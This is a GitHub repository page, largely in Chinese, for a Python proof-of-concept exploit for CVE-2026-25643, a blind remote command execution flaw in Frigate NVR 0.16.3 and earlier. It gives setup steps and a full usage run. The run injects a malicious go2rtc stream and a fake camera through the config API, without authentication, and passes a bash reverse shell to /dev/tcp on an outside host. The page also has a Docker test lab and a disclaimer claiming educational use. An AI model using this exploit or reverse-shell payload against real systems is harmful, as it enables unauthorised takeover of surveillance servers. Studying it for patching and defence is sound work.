joshuavanderpoll/CVE-2026-25643

GitHub: joshuavanderpoll/CVE-2026-25643

针对 Frigate NVR ≤0.16.3 版本的盲 RCE 漏洞 PoC,通过 go2rtc 执行注入实现远程命令执行。

Stars: 4 | Forks: 0

Frigate NVR ≤ 0.16.3 盲 RCE 漏洞利用 (CVE-2026-25643) PoC

Python

## 📜 描述 此 Python 漏洞利用程序针对 Frigate NVR 0.16.3 及更早版本中的一个关键配置操纵漏洞(包含已验证和未验证路径)。通过注入恶意的 go2rtc stream 和伪造的摄像头条目,它会在服务重启期间以 Frigate 进程的身份触发任意命令执行——无需 reverse shell 或输出捕获。 ## 🛠️ 安装 ### OSX/Linux ``` git clone https://github.com/joshuavanderpoll/CVE-2026-25643.git cd CVE-2026-25643 python3 -m venv .venv source .venv/bin/activate pip3 install -r requirements.txt ``` ### Windows ``` git clone https://github.com/joshuavanderpoll/CVE-2026-25643.git cd CVE-2026-25643 python -m venv .venv .venv\Scripts\activate pip3 install -r requirements.txt ``` ## ⚙️ 用法 ``` python3 CVE-2026-25643.py -c "bash -i >& /dev/tcp/host.docker.internal/1111 0>&1" --url http://localhost:5001/ Target : http://localhost:5001 Command: bash -i >& /dev/tcp/host.docker.internal/1111 0>&1 [!] No credentials provided → attempting unauthenticated access [*] Fetching current configuration (/api/config/raw) ... [*] Config fetch → HTTP 200 [*] Received 914 bytes [*] Config was JSON-wrapped → unwrapped [+] Config parsed successfully (7 top-level keys) [*] Preparing payload → executing: bash -i >& /dev/tcp/host.docker.internal/1111 0>&1 [*] Using payload: bash -c 'bash -i >& /dev/tcp/host.docker.internal/1111 0>&1' [+] Injected malicious stream → debug_cmd [+] Injected trigger camera → trigger_exec [*] Sending modified config (861 bytes) with option: restart [*] Config save → HTTP 200 [+] Configuration accepted (server should restart) ============================================================ Payload sent! Command should execute during go2rtc init / camera probe. Keep in mind: • Output is NOT captured (blind execution) • Command runs as the user/frigate process • Multiple executions may occur during restart ============================================================ ``` ## 🐋 Docker PoC ``` cd docker/ docker compose down docker compose up -d # 你可以在 --url http://127.0.0.1:5001 处测试 ``` ## 💻 示例 ![执行 PoC](/assets/execute.jpg) ![接收连接](/assets/listener.jpg) ## 🕵🏼 参考 - 灵感来源于 https://github.com/jduardo2704/CVE-2026-25643-Frigate-RCE ## 📢 免责声明 本工具仅供教育和研究目的提供。创建者不对因使用本工具而造成的任何滥用或损害承担任何责任。
标签:0day, Blind RCE, CISA项目, CVE-2026-25643, Exploit, Frigate NVR, go2rtc, PoC, Python, RCE, 命令注入, 无后门, 暴力破解, 编程工具, 网络安全, 网络安全审计, 请求拦截, 远程代码执行, 逆向工具, 配置 manipulation, 隐私保护